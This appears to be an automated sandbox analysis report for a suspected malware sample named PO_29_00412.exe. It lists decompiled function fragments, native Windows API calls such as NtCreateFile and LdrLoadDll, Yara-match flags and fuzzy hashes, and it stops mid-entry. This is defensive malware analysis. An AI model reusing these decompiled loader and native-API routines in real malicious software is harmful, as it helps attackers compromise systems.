                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID: Error launching installer
                                                                            • API String ID: 3712363035-66219284
                                                                            • Opcode ID: c3ebc3f9998ac015d8c7df4fd8e4914833f251e822556357c2f70f84276a4d27
                                                                            • Instruction ID: 5185fe82c3568d3c8632712b5ff5a6750f12376067ae41ef0f6fc1d41a32777d
                                                                            • Opcode Fuzzy Hash: c3ebc3f9998ac015d8c7df4fd8e4914833f251e822556357c2f70f84276a4d27
                                                                            • Instruction Fuzzy Hash: D6E0BFF4A00209BFEB109F64ED09F7B77ACEB04644F508425BE51F2150D77899658A78
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405C07, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405C07(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                            0x00405c08
                                                                            0x00405c12
                                                                            0x00405c14
                                                                            0x00405c1b
                                                                            0x00405c23
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405c23
                                                                            0x00405c25
                                                                            0x00405c2a

                                                                            APIs
                                                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO_29_00412.exe,C:\Users\user\Desktop\PO_29_00412.exe,80000000,00000003), ref: 00405C0D
                                                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F5D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO_29_00412.exe,C:\Users\user\Desktop\PO_29_00412.exe,80000000,00000003), ref: 00405C1B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CharPrevlstrlen
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 2709904686-1669384263
                                                                            • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                            • Instruction ID: 741041d8a9fca0cd730fa631f59021aaf6e5318b071c559ffeb457c432b97b3b
                                                                            • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                            • Instruction Fuzzy Hash: 09D0C77241DA706EF70363149D05B9F6A48DF57700F1A44A6E581A6191C77C4C524BFD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405D26, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405D26(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                            0x00405d36
                                                                            0x00405d38
                                                                            0x00405d3b
                                                                            0x00405d67
                                                                            0x00405d40
                                                                            0x00405d49
                                                                            0x00405d4e
                                                                            0x00405d59
                                                                            0x00405d5c
                                                                            0x00405d78
                                                                            0x00405d5e
                                                                            0x00405d65
                                                                            0x00000000
                                                                            0x00405d65
                                                                            0x00405d71
                                                                            0x00405d75
                                                                            0x00405d75
                                                                            0x00405d6f
                                                                            0x00000000

                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D36
                                                                            • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                                                            • CharNextA.USER32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D68
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                            • Instruction ID: 00b114ba7cac9785f06d25343f2ff2c8ce87c9cf7580b170eb884579fc1bcc0a
                                                                            • Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                                            • Instruction Fuzzy Hash: 45F0F631100818BFCB02DFA4CD04D9EBBA8EF55354B2580BBE840FB210D634DE01AFA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Analysis Process: PO_29_00412.exe PID: 5980 Parent PID: 5760 PO_29_00412.exeCOMMON

                                                                            Executed Functions

                                                                            Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 37%
                                                                            			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                            0x00418263
                                                                            0x0041826f
                                                                            0x00418277
                                                                            0x00418282
                                                                            0x0041829d
                                                                            0x004182a5
                                                                            0x004182a9

                                                                            APIs
                                                                            • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID: B=A$B=A
                                                                            • API String ID: 2738559852-2767357659
                                                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                            • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                            • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00409B10(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t31;
				void* _t32;
				void* _t33;

				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t32 = _t31 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(__eflags, _v8);
					_t33 = _t32 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0(__ebx,  &_v12, 0);
						_t33 = _t33 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                            0x00409b2c
                                                                            0x00409b2f
                                                                            0x00409b34
                                                                            0x00409b39
                                                                            0x00409b43
                                                                            0x00409b48
                                                                            0x00409b4b
                                                                            0x00409b4d
                                                                            0x00409b55
                                                                            0x00409b5a
                                                                            0x00409b5a
                                                                            0x00409b61
                                                                            0x00409b69
                                                                            0x00409b6c
                                                                            0x00409b6e
                                                                            0x00409b82
                                                                            0x00000000
                                                                            0x00409b84
                                                                            0x00409b8a
                                                                            0x00409b3e
                                                                            0x00409b3e
                                                                            0x00409b3e

                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                            • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                            • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                            • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				void* _t17;
				long _t21;
				long _t27;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t27 = _a48;
				_t17 = _a44;
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _t17, _t27); // executed
				return _t21;
			}







                                                                            0x004181bf
                                                                            0x004181c7
                                                                            0x004181cc
                                                                            0x004181cf
                                                                            0x004181fd
                                                                            0x00418201

                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                            • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                            • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004182DA, Relevance: 1.5, APIs: 1, Instructions: 36nativeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 58%
                                                                            			E004182DA(void* __eax, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20) {
				intOrPtr _v55;
				void* _t10;

				asm("sbb al, 0x5b");
				_t10 = __eax - _v55;
				if (_t10 >= 0) goto L3;
			}





                                                                            0x004182da
                                                                            0x004182dc
                                                                            0x004182df

                                                                            APIs
                                                                            • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: a3daaf078b7ca833133ce3e035bbef7ce657acb3770b0cd24c1b6a2fa2f45b19
                                                                            • Instruction ID: 6139a172401e0b6bfc943a0251530c190a18f8d98c3f3e6cee21849eb26e46c5
                                                                            • Opcode Fuzzy Hash: a3daaf078b7ca833133ce3e035bbef7ce657acb3770b0cd24c1b6a2fa2f45b19
                                                                            • Instruction Fuzzy Hash: A1F05E76200214AFDB10EF98EC80EEB77A9EF88750F148559FA189B241C630EA118BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004181AA, Relevance: 1.5, APIs: 1, Instructions: 33filenativeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 79%
                                                                            			E004181AA(void* __esi, void* __eflags, long _a4, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48) {
				void* __ebp;
				void* _t15;

				asm("xlatb");
				if(__eflags != 0) {
					return _t15;
				} else {
					if(__eflags <= 0) {
						__esi = __esi - 1;
						__eflags = __esi;
						__ebp = __esp;
						__eax = _a4;
						_push(__esi);
						_t3 = __eax + 0xc40; // 0xc40
						__esi = _t3;
						E00418DB0(__edi, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28) = _a44;
					}
					__esp = __esp + 0x14;
					_a36 = _a24;
					__eax = _a12;
					__eax = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a12, _a16); // executed
					_pop(__esi);
					return __eax;
				}
			}





                                                                            0x004181aa
                                                                            0x004181ab
                                                                            0x004181a9
                                                                            0x004181ad
                                                                            0x004181ad
                                                                            0x004181af
                                                                            0x004181af
                                                                            0x004181b1
                                                                            0x004181b3
                                                                            0x004181b9
                                                                            0x004181bf
                                                                            0x004181bf
                                                                            0x004181cf
                                                                            0x004181cf
                                                                            0x004181d5
                                                                            0x004181e9
                                                                            0x004181f5
                                                                            0x004181fd
                                                                            0x004181ff
                                                                            0x00418201
                                                                            0x00418201

                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: d5ab14c4ad75129ae44f11daaefdbbf82298f557f787b086f0e786d0f5d8979b
                                                                            • Instruction ID: 78969520041bed1203aeaf83b2857a416025afc906d07f232de719120c6250f2
                                                                            • Opcode Fuzzy Hash: d5ab14c4ad75129ae44f11daaefdbbf82298f557f787b086f0e786d0f5d8979b
                                                                            • Instruction Fuzzy Hash: E0F098B2214409AB8B04DF8CDD80DEB73ADEB8C354B05820DFA1DD3201D634E8518BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                            0x0041839f
                                                                            0x004183a7
                                                                            0x004183c9
                                                                            0x004183cd

                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                            • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                            • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261176274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                            • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                            • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: ca9673f3ae0644b396a1594a7c4336876b21773c0ba6c7f527f01b7f528083ec
                                                                            • Instruction ID: 3d1615de6c56f06f0ff5e36b46861abd4723f7fadd185fb075f4862fd2935f2c
                                                                            • Opcode Fuzzy Hash: ca9673f3ae0644b396a1594a7c4336876b21773c0ba6c7f527f01b7f528083ec
                                                                            • Instruction Fuzzy Hash: E190026160100503D24171694404656040ED7D1381F91C032A1014555FDA659992F171
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 474b4846cb7e3150ab55ec08d1e9969b35fb9b48e5218bfae338c75501cddc2d
                                                                            • Instruction ID: 6df4891800f47df5f9e08221899be906ae1fcf80be08c15367bcbe41161ac993
                                                                            • Opcode Fuzzy Hash: 474b4846cb7e3150ab55ec08d1e9969b35fb9b48e5218bfae338c75501cddc2d
                                                                            • Instruction Fuzzy Hash: 0590027120100413D25161694504747040DD7D1381F91C432A0414558EE6969952F161
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: df0676b926bb5472795a346498651246e71f42d804a780eeda38b72e3b04fadc
                                                                            • Instruction ID: 331cc2321284339b9588ba9105258c812fadb2e59b93484b8013687dd2800182
                                                                            • Opcode Fuzzy Hash: df0676b926bb5472795a346498651246e71f42d804a780eeda38b72e3b04fadc
                                                                            • Instruction Fuzzy Hash: 15900261242041535685B1694404547440AE7E1381B91C032A1404950DD566A856E661
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: ae21ca3e4c32c633432756de54acf6eeefc6ae974910485529e618fc5eac9993
                                                                            • Instruction ID: f49a0107b9a24f2d1451da864ef388e1cba7168369bc5c709a1ee77fd4b7d807
                                                                            • Opcode Fuzzy Hash: ae21ca3e4c32c633432756de54acf6eeefc6ae974910485529e618fc5eac9993
                                                                            • Instruction Fuzzy Hash: 269002A134100443D24061694414B460409D7E2341F51C035E1054554ED659DC52B166
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: a82f4fe4707a46e40235d3fcdbe986c6af214773b6a1d2925c56fe3a1d79f335
                                                                            • Instruction ID: a2b8023129af706a9904be323226642d2fc4e06943a47bfcf3b7b67adb9b6ac0
                                                                            • Opcode Fuzzy Hash: a82f4fe4707a46e40235d3fcdbe986c6af214773b6a1d2925c56fe3a1d79f335
                                                                            • Instruction Fuzzy Hash: 879002B120100403D280716944047860409D7D1341F51C031A5054554FD6999DD5B6A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4dba4587f79ef45a55e2cbf286225c860941c0fe209a95e3da76f7aa65347950
                                                                            • Instruction ID: 991ae33388391909576dd74927282791e14e25267cd5d5ee5abb74eb19a36c74
                                                                            • Opcode Fuzzy Hash: 4dba4587f79ef45a55e2cbf286225c860941c0fe209a95e3da76f7aa65347950
                                                                            • Instruction Fuzzy Hash: 8B900261601000434280717988449464409FBE2351B51C131A0988550ED5999865A6A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 732c9e6a75c5b9a01135da0f5770f8be45ba7ec58b1801fc82b76b218e484222
                                                                            • Instruction ID: e6a4cf25f9f5dac928e8201cc246889bd2c2f20e61966c61743369ccb8fbb7fe
                                                                            • Opcode Fuzzy Hash: 732c9e6a75c5b9a01135da0f5770f8be45ba7ec58b1801fc82b76b218e484222
                                                                            • Instruction Fuzzy Hash: D490027120140403D2406169481474B0409D7D1342F51C031A1154555ED6659851B5B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 5a4f160dc68b6b12274edf87a56c7cb7fd88fb8bc9d77bb1a06be446e458bae4
                                                                            • Instruction ID: c0574123a9398dfb9eb4c910035748f7a6044fb5c1d95491d4f3f7f3fd387dff
                                                                            • Opcode Fuzzy Hash: 5a4f160dc68b6b12274edf87a56c7cb7fd88fb8bc9d77bb1a06be446e458bae4
                                                                            • Instruction Fuzzy Hash: EB90026121180043D34065794C14B470409D7D1343F51C135A0144554DD9559861A561
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.261540179.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: ff8dac8ab9cde65165966810d1f137b3e885e3d67f8e3d053847fb572b21d313
                                                                            • Instruction ID: 015ec985d69ca0388917617d075288e35ce77591b3fdcf7ce383e8298028bb3d
                                                                            • Opcode Fuzzy Hash: ff8dac8ab9cde65165966810d1f137b3e885e3d67f8e3d053847fb572b21d313
                                                                            • Instruction Fuzzy Hash: 2D9002A120200003424571694414656440ED7E1341F51C031E1004590ED5659891B165
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00AA9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
